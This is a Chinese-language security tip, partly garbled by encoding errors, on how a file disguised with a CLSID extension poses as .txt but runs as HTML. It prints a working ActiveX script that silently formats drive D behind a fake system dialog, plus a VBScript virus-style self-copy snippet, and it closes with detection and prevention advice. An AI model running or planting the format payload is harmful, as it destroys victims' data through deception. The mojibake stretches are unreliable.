危险的.txt文件
?牐牸偃缒闶盏降挠始郊杏幸桓隹雌鹄词钦庋奈募篞Q靓号放送.txt,你是不是认为它肯定是纯文本文件?我要告诉你,不一定!它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。其中?焮3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来,你看到的就是个.txt文件,这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢?因为如果这个文件的内容是:
?牐?<script>
?牐燼=new ActiveXObject("WSCript.Shell");
?牐燼.run("format.com d:/q /autotest /u");
?牐燼lert("Windows is configuring the system. Please do not interrupt this process.");
?牐?</script>
?牐犇敲词撬突岬饔昧薎E来运行,并且没有任何提示自动在后台开始格式化D盘,同时显示“Windows is configuring the system。Plase do not interrupt this process。”这样一个对话框来欺骗你。你看随意打开附件中的.txt文件是不是很危险?
?牐牼哂衅苹底饔玫?.txt文件实现原理:当你双击这个伪装起来的.txt文件的时候,由于真正的文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B},也就是.html文件,于是就会以html文件的形式运行,这是它能运行起来的先决条件。
?牐犖募谌葜械牡?2和第3行是它能够产生破坏作用的关键所在。其中第3行是破坏行动的执行者,在其中可以加载带有破坏性质的命令。那么第2行又是干什么的呢?你可能已经注意到了第2行里的“WSCript”,对!就是它导演了全过程。
?牐燱Script全称Windows Scripting Host,它是Windows98新增的功能,是一种批次语言/自动执行工具──它所对应的程序“WScript.exe”是一个脚本语言解释器,位于c:\Windows下,正是它使得脚本可以被执行,就像执行批处理一样。在Windows Scripting Host脚本环境里,预定义了一些对象,通过它自带的几个内置对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。
?牐犗旅嫖颐峭ü桓鲂±永此得鱓indows Scripting Host功能是如何的强大,使用又是怎样的简单,被有心人利用后的威胁有多大。例如有内容如下的*.vbs文件:
?牐燬et so=CreateObject("Scripting.FileSystemObject")
?牐爏o.GetFile(c:\Windows\winipcfg.exe).Copy("e:\winipcfg.exe")
?牐牼褪钦饷戳叫芯涂梢钥奖次募街付ǖ氐恪5谝恍惺谴唇ㄒ桓鑫募低扯韵螅诙星懊媸谴蚩飧鼋疟疚募琧:\Windows\winipcfg.exe指明是这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到E盘根目录下。这也是大多数利用VBscript编写的病毒的一个特点。从这里可以看出,禁止了FileSystemObject这个对象就可以很有效地控制这种病毒的传播。用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。
?牐犑侗鹩敕婪兜姆椒ǎ赫庵执衅燮灾实?.txt文件显示出来的并不是文本文件的图标,它显示的是未定义文件类型的标志,这是区分它与正常.txt文件的最好方法。识别的另一个办法是在“按WEB页方式”查看时在“我的电脑”左面会显示出其文件名全称,此时可以看到它不是真正的.txt文件。在这里再次提醒你,注意你收到的邮件中附件的文件名,不仅要看它显示出来的扩展名,还要注意其实际显示的图标是怎样的。对于附件中别人发来的看起来是.txt的文件,可以将它下载后用鼠标右键选择“用记事本打开”,这样看会很安全。